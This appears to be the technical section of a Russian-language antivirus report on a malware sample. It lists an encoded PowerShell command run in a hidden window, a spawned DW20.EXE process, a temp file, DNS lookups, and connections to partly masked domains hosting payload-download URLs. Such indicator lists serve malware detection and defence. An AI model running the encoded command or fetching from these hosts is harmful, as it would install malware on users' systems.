Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABwADEANwA3ADIAMgA9ACcAcgAyADEANQAwADkAJwA7ACQAdwBfADAANwAwADUAXwAgAD0AIAAnADEANwAyACcAOwAkAEkAMQAwADMAXwBfAD0AJwBuADEAXwA0ADMANQAxADgAJwA7ACQAbgA0ADkAMAA4ADEAPQAkAGUAbgB2ADoAdQBzAGUAc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1968
- %TEMP%\818615.cvr
- 'vi####.lamaghrebine.com':80
- 'vi####.lamaghrebine.com':443
- 'am###ron.com':80
- 'mm##ts.com':80
- 'mm##ts.com':443
- 'xg####rmatica.com':80
- 'wa#####valleyliving.com':80
- 'wa#####valleyliving.com':443
- http://vi####.lamaghrebine.com/wp-admin/r94617/
- http://am###ron.com/1e7t86n/dbi6281/
- http://mm##ts.com/11/0qb064/
- http://xg####rmatica.com/aydasesores.com/g0183/
- http://wa#####valleyliving.com/images/classes/du4yz01294/
- 'vi####.lamaghrebine.com':443
- 'mm##ts.com':443
- 'wa#####valleyliving.com':443
- DNS ASK vi####.lamaghrebine.com
- DNS ASK am###ron.com
- DNS ASK mm##ts.com
- DNS ASK xg####rmatica.com
- DNS ASK wa#####valleyliving.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABwADEANwA3ADIAMgA9ACcAcgAyADEANQAwADkAJwA7ACQAdwBfADAANwAwADUAXwAgAD0AIAAnADEANwAyACcAOwAkAEkAMQAwADMAXwBfAD0AJwBuADEAXwA0ADMANQAxADgAJwA7ACQAbgA0ADkAMAA4ADEAPQAkAGUAbgB2ADoAdQBzAGUAc...' (со скрытым окном)